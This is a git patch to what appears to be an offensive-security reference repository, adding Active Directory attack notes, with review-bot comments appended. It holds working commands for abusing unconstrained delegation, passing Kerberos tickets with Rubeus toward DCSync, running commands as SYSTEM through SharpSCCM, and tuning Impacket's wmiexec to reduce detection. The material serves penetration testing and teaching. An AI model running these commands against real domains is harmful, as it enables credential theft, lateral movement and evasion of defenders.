From ae46ac03380958af2c44c3a81a2d56a6759802c7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 15 Feb 2023 12:33:20 +0100 Subject: [PATCH] WMIExec + SharpSCCM --- .../Active Directory Attack.md | 18 ++++++++++++++++-- .../Windows - Using credentials.md | 6 ++++++ 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 14d410a..a1a3828 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma :warning: Unconstrained delegation used to be the only option available in Windows 2000 +> **Warning** +> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket + #### SpoolService Abuse with Unconstrained Delegation The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. @@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer ##### Find delegation :warning: : Domain controllers usually have unconstrained delegation enabled. -Check the `TrustedForDelegation` property. +Check the `TRUSTED_FOR_DELEGATION` property. * [ADModule](https://github.com/samratashok/ADModule) ```powershell @@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property. cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation ``` +* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` +* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` + ##### SpoolService status Check if the spool service is running on the remote host 
@@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller. Extract the base64 TGT from Rubeus output and load it to our current session. ```powershell -.\Rubeus.exe asktgs /ticket: /ptt +.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt ``` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` @@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th * [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) * [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) + +* Using **SharpSCCM** + ```ps1 + .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe exec -d -r + .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug + ``` * Compromise client, use locate to find management server ```ps1 MalSCCM.exe locate @@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ConvertFrom-SddlString "" ``` + ### SCCM Shares > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index dc1644c..549f8ea 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -10,6 +10,7 @@ * [Crackmapexec](#crackmapexec) * [Impacket](#impacket) * [PSExec](#psexec) + * [WMIExec](#wmiexec) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol) 
@@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu You need to update the pipe name to match "Custom_communication" in the line 163 `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` +### WMIExec + +Use a non default share `-share SHARE` to write the output to reduce the detection. +By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` + ## RDP Remote Desktop Protocol
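Review bot: the new warning in the `@@ -3422` hunk of `Active Directory Attack.md` states the rule without the reason, and the reason is what lets a reader apply it to other coercion primitives. Suggest extending the line to say why: when the coerced host is told to authenticate to an IP address it cannot build an SPN for the target, so it falls back to NTLM and the unconstrained-delegation host never receives a TGT, e.g. `> Remember to coerce to a HOSTNAME (not an IP address) if you want a Kerberos ticket; an IP target yields NTLM authentication instead.`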
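Review bot: the rename from `TrustedForDelegation` to `TRUSTED_FOR_DELEGATION` in the `@@ -3436` hunk swaps one naming for another without saying which is which. `TRUSTED_FOR_DELEGATION` is the `userAccountControl` flag (0x80000, decimal 524288, the value the LDAP filter added later in this patch tests), while `TrustedForDelegation` is the attribute name the AD module and PowerView expose for that bit, so the old wording was not wrong. Suggest keeping both so the reader can match the name to whichever tool they use: `Check the TRUSTED_FOR_DELEGATION bit (0x80000) of userAccountControl, exposed as the TrustedForDelegation property by the AD module.`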
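Review bot: both new bullets in the `@@ -3455` hunk return the domain controllers as well, which the warning a few lines above this list says are expected to have unconstrained delegation; as written the output is dominated by hosts the reader already knows about. Suggest excluding DCs in the LDAP filter, e.g. `"(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))"` (516 is the Domain Controllers primary group), and adding a few words that `1.2.840.113556.1.4.803` is the bitwise-AND matching rule and 524288 is `TRUSTED_FOR_DELEGATION`. Two smaller points: the bullets are appended directly after the closing fence of the crackmapexec block with no blank line, and the "Powershell Active Directory module" one-liner belongs with the existing ADModule bullet earlier in the same list rather than as a separate entry (also `PowerShell`, capital S).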
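Review bot: in the `@@ -3499` hunk the command now requests service tickets for `LDAP/dc.lab.local` and `cifs/dc.lab.local`, but the unchanged sentence above it still says "Extract the base64 TGT from Rubeus output and load it to our current session", which describes `/ptt` of the TGT, not `asktgs`. Suggest updating the prose to say that the DC's TGT is used to request service tickets, the LDAP one being what DCSync (the stated goal of this section) needs and the CIFS one giving SMB access, and replacing the lab-specific `dc.lab.local` with a placeholder host as the rest of the file does.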
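Review bot: the new SharpSCCM bullet in the `@@ -3768` hunk is inserted between the MalSCCM link and the MalSCCM procedure that follows it ("Compromise client, use locate to find management server", `MalSCCM.exe locate`), so it splits a single tool's steps in two; move it before the MalSCCM link or after the last MalSCCM step, and drop the leading blank line that the hunk adds inside the list. The three commands also cover two distinct modes without saying so: `exec -d -r` coerces the target client to authenticate to a relay server, while `exec -d WS01 -p "..." -s` runs a command on the client as SYSTEM. A `#` comment line above each in the `ps1` fence would make that clear.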
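Review bot: the new WMIExec section in the `@@ -162` hunk of `Windows - Using credentials.md` never names the tool; the `-share` option and the `cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__... 2>&1` pattern are Impacket's `wmiexec.py`, and the heading should say so as the PSExec section above it does for its tool. Two corrections to the text: the output file name is `__` followed by a timestamp rather than a random value, so `__<timestamp>` is more accurate than `__RANDOM`, and "reduce the detection" reads better as "reduce detection" (also no space before the colon in "By default this command is executed :"). Worth adding that changing the share only changes the UNC path in that command line; `cmd.exe /Q /c` and the `127.0.0.1` loopback redirection remain in the process creation event, so detections keyed on those still fire, and `-nooutput` avoids writing the output file altogether at the cost of seeing no results.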